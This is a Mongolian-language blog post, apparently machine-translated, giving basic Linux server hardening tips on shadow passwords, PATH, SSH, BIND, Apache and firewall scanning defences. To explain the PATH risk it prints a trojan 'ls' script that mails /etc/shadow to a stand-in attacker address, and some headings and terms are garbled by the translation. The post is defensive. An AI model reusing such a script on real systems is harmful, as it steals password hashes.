Таны Линукс (Сервер) -ийн аюулгүй байдлын зөвлөмжүүд (Хэсэг 1)

Би блог дээрээ удаан хугацаанд юу ч нийтлээгүй байсан бөгөөд энэ номноос зарим зөвлөмжийг хуваалцахыг хүсч байна. (Бусдын дунд). Би үүнийг их сургуулиас олж мэдээд дөнгөж сая уншсан бөгөөд энэ нь үнэндээ жаахан хуучирсан, системийн хувьсал өөрчлөгдсөний дагуу үзүүлсэн техникүүд нь ажиллах магадлал багатай боловч эдгээрийг үзүүлж болох сонирхолтой талууд юм. 9788448140502

Эдгээр нь ширээний хэрэглэгчийн түвшинд хэрэглэгддэг хэдий ч тийм ч их ашиггүй байх тул сервер болгон ашигладаг Линуксийн системд чиглэсэн зөвлөгөө юм.

Эдгээр нь энгийн бөгөөд хурдан зөвлөмжүүд гэдгийг би тэмдэглэж байна. Гэхдээ би тодорхой сэдвээр өөр илүү тодорхой, өргөн цар хүрээтэй бичлэг хийхээр төлөвлөж байгаа ч дэлгэрэнгүй ярихгүй. Гэхдээ үүнийг дараа нь харах болно. Эхэлцгээе.

Нууц үгийн бодлого. 

Хэдийгээр энэ нь үг хэллэг шиг сонсогдож байгаа ч нууц үгийн бодлогоо сайн хэрэгжүүлснээр эмзэг системийн хооронд ялгаа бий болдог. "Бүдүүлэг хүч" гэх мэт халдлага нь системд нэвтрэхийн тулд нууц үгээ буруу ашиглах давуу талыг ашигладаг. Хамгийн нийтлэг зөвлөмжүүд нь:

  • Том жижиг үсгийг хослуул.
  • Тусгай тэмдэгтүүдийг ашиглана уу.
  • Тоо.
  • 6-аас дээш оронтой (8-аас дээш гэж найдаж байна).

Үүнээс гадна хоёр чухал файлыг авч үзье.  / etc / passwd ба / etc / shadow.

Маш чухал зүйл бол файл юм / etc / passwd. Хэрэглэгчийн нэр, түүний uid, фолдерын зам, bash .. гэх мэтийг бидэнд өгөхөөс гадна. зарим тохиолдолд хэрэглэгчийн шифрлэсэн түлхүүрийг харуулдаг.

 Түүний ердийн найрлагыг авч үзье.

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

хэрэглэгч: cryptkey: uid: gid: path :: path: bash

Энд байгаа жинхэнэ асуудал бол энэ файл нь зөвшөөрөлтэй байх явдал юм -rw-r - r– Энэ нь систем дээрх бүх хэрэглэгчид унших зөвшөөрөлтэй гэсэн үг юм. мөн шифрлэгдсэн түлхүүртэй байх нь жинхэнэ түлхүүрийг тайлахад тийм ч хэцүү биш юм.

Ийм учраас файл байдаг / etc / shadow. Энэ бол бусад бүх хэрэглэгчийн түлхүүрүүдийг хадгалах файл юм. Энэ файлд шаардлагатай зөвшөөрөл байгаа тул хэрэглэгч үүнийг унших боломжгүй болно.

Үүнийг засахын тулд бид файл руу очих ёстой / etc / passwd файл шифрлэгдсэн түлхүүрийг "x" болгож өөрчилснөөр түлхүүр зөвхөн манай файлд хадгалагдах болно / etc / shadow.

desdelinux:x:500:501::/home/usuario1:/bin/bash

PATH ба .bashrc болон бусадтай холбоотой асуудлууд.

Хэрэглэгч консол дээрээ тушаалыг гүйцэтгэхдээ бүрхүүл нь PATH орчны хувьсагч дотор байгаа директорын жагсаалтаас тухайн командыг хайж олох болно.

Хэрэв та консол дээр "echo $ PATH" гэж бичвэл энэ нь иймэрхүү зүйл гарах болно.

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

Эдгээр хавтас бүр нь бүрхүүл нь түүнийг гүйцэтгэхийн тулд бичсэн тушаалыг хайж олох болно. Тэр "." энэ нь хамгийн түрүүнд командыг ажиллуулж байгаа хавтас юм гэсэн үг юм.

"Карлос" хэрэглэгч байгаа бөгөөд энэ хэрэглэгч "бузар муу зүйл хийхийг" хүсч байна гэж бодъё. Энэ хэрэглэгч "ls" нэртэй файлыг үндсэн хавтастаа үлдээж болох бөгөөд энэ файлд дараах тушаалыг гүйцэтгэж болно.

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

Хэрэв очсон зүйлийнхээ root хэрэглэгч нь carlos хавтас доторх хавтаснуудыг жагсаахыг оролдвол (тэр хавтсыг эхлээд командыг хайж байгаа тул санамсаргүйгээр энэ имэйл рүү, дараа нь фолдерт байгаа файлыг нууц үгээр илгээх болно. жагсаах байсан бөгөөд тэр үүнийг маш орой болтол олж мэдсэнгүй.

Үүнээс зайлсхийхийн тулд бид "" -г арилгах ёстой. PATH хувьсагчийн.

Үүнтэй адилаар, /.bashrc, /.bashrc_profile, ./.login зэрэг файлуудыг шалгаж, "" байхгүй эсэхийг шалгах хэрэгтэй. PATH хувьсагч дотор, үнэндээ ийм файлуудаас та тодорхой тушаалын очих газрыг өөрчилж болно.

Үйлчилгээтэй холбоотой зөвлөмжүүд:

Ххх

  • Sshd_config файл дахь ssh протоколын 1-р хувилбарыг идэвхгүй болгох.
  • Root хэрэглэгчийг ssh хаягаар нэвтрэхийг бүү зөвшөөр.
  • Ssh_host_key, ssh_host_dsa_key, ssh_host_rsa_key файлууд болон хавтасуудыг зөвхөн root хэрэглэгч унших ёстой.

BIND

  • Нэвтрэх дугаарыг харуулахгүйн тулд нэр бүхий файлд тавтай морилно уу .conf файлыг өөрчилнө үү
  • Бүсийн шилжүүлгийг хязгаарлаж, зөвхөн шаардлагатай багуудад үүнийг идэвхжүүлээрэй.

Апачи

  • Үйлчилгээг тавтай морилно уу мессеж дээр таны хувилбарыг харуулахаас урьдчилан сэргийлэх. Httpd.conf файлыг засварлаж, мөрүүдийг нэмэх эсвэл өөрчлөх:  

ServerSignature Off
ServerTokens Prod

  • Автомат индексжүүлэлтийг идэвхгүй болгох
  • .Htacces, * .inc, * .jsp .. гэх мэт эмзэг файлд үйлчлэхгүй байхаар apache-г тохируулна уу
  • Үйлчилгээнээс эрэгтэй хуудсууд эсвэл дээжийг устгах
  • Бохирдсон орчинд apache ажиллуулна уу

Сүлжээний аюулгүй байдал.

Гадны сүлжээнээс таны системд оруулах боломжтой бүх мэдээллийг хамрах нь зайлшгүй шаардлагатай бөгөөд халдагчид сканнердаж, сүлжээнээс мэдээлэл авахаас урьдчилан сэргийлэх хэдэн чухал зөвлөмжийг энд оруулав.

ICMP урсгалыг блоклох

Галт хана нь бүх төрлийн ирж буй болон гарч буй ICMP траффик, цуурай хариу үйлдлийг хаахаар тохируулагдсан байх ёстой. Жишээлбэл, олон тооны ip дотор амьд төхөөрөмж хайж буй сканнерчин таныг олохоос зайлсхийх болно. 

TCP пинг скан хийхээс зайлсхий.

Таны системийг сканнердах нэг арга бол TCP пинг скан хийх явдал юм. Таны сервер дээр 80-р порт дээр Apache сервер байгаа гэж үзье. Халдлагагүй этгээд ACK хүсэлтийг тухайн порт руу илгээж болох бөгөөд хэрэв систем хариу өгвөл компьютер амьд байх бөгөөд үлдсэн портуудыг сканнердах болно.

Үүний тулд таны галт хана үргэлж "төлөв байдлын мэдлэг" гэсэн сонголттой байх ёстой бөгөөд аль хэдийн байгуулагдсан TCP холболт эсвэл сессд тохирохгүй бүх ACK пакетуудыг устгах ёстой.

Зарим нэмэлт зөвлөмжүүд:

  • Өөрийн сүлжээнд портын сканнердахыг илрүүлэхийн тулд IDS системийг ашиглана уу.
  • Галт ханыг холболтын эх үүсвэрийн портын тохиргоонд итгэхгүй байхаар тохируулна уу.

Учир нь зарим сканнердлууд нь 20 эсвэл 53 гэх мэт "хуурамч" эх үүсвэрийн портыг ашигладаг тул олон системүүд эдгээр портууд нь ftp эсвэл DNS-тэй байдаг тул итгэдэг.

ТАЙЛБАР: Энэ нийтлэлд дурдсан ихэнх асуудлууд бараг бүх одоогийн хуваарилалтад аль хэдийн шийдэгдсэн гэдгийг санаарай. Гэхдээ эдгээр асуудлууд танд тохиолдохгүй байхын тулд гол мэдээллүүдтэй байх нь хэзээ ч өвддөггүй.

ТАЙЛБАР: Дараа нь би тодорхой сэдвийг үзэх болно, би илүү нарийвчилсан, одоогийн мэдээллээр бичлэг оруулах болно.

Бүгдийг уншихыг хүсч байна.

Сайн байцгаана уу.


Нийтлэлийн агуулга нь бидний зарчмуудыг баримталдаг редакцийн ёс зүй. Алдааны талаар мэдээлэхийн тулд товшино уу энд байна.

Сэтгэгдэл бичих, үлдээх

Сэтгэгдэлээ үлдээгээрэй

Таны и-мэйл хаяг хэвлэгдсэн байх болно.

*

*

  1. Мэдээллийг хариуцах: Мигель Анхель Гатан
  2. Мэдээллийн зорилго: СПАМ-ыг хянах, сэтгэгдлийн менежмент.
  3. Хууль ёсны байдал: Таны зөвшөөрөл
  4. Мэдээллийн харилцаа холбоо: Хуулийн үүргээс бусад тохиолдолд мэдээллийг гуравдагч этгээдэд дамжуулахгүй.
  5. Өгөгдөл хадгалах: Occentus Networks (ЕХ) -с зохион байгуулсан мэдээллийн сан
  6. Эрх: Та хүссэн үедээ мэдээллээ хязгаарлаж, сэргээж, устгаж болно.

  1.   мэдээлэлтэй гэж хэлэв

    Нийтлэл надад маш их таалагдсан бөгөөд энэ сэдвийг сонирхож байгаа тул контентоо үргэлжлүүлэн байршуулахыг уриалж байна.